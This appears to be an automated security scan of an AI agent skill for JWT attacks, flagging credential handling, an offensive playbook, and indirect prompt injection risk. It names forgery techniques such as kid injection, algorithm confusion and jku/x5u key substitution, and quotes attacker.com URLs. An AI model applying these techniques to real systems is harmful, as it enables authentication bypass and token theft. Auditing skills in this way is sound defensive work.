jwt-attack-methodology

HIGH W007: Insecure credential handling detected in skill instructions.

• Insecure credential handling detected (high risk: 0.90). The prompt instructs extracting JWTs, brute-forcing or using recovered signing keys, and constructing/sending forged tokens (including embedding known/derived keys or token strings), which requires the agent to handle and potentially output secret token/credential values verbatim.

CRITICAL E006: Malicious code pattern detected in skill scripts.

• Malicious code pattern detected (high risk: 1.00). This content is an explicit offensive playbook that teaches deliberate abuse (auth bypass, token forgery, secret exfiltration, SQL/path/command injection via kid, RS256→HS256 and jku/x5u attacks, brute‑forcing HMAC secrets and RCE/SSTI vectors), and thus poses a high risk of malicious misuse.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

• Third-party content exposure detected (high risk: 1.00). The skill's required workflow (SKILL.md, AGENT.md, and references/jwt-advanced.md) explicitly instructs the agent to fetch and use public JWKS/JKU endpoints and arbitrary URLs (e.g., /.well-known/jwks.json, /api/jwks, and attacker-controlled jku/x5u URLs like http://attacker.com/jwks.json) and to treat that remote content as keys/inputs that determine token signing and verification, which exposes the agent to untrusted third‑party content that can materially influence actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

• Potentially malicious external URL detected (high risk: 0.90). The skill explicitly instructs runtime fetching of attacker-controlled JWKS (e.g., "http://attacker.com:8080/jwks.json") and shows code that requests and uses that remote JWKS to build keys and sign tokens, so the fetched URL content directly controls code execution and the agent's actions.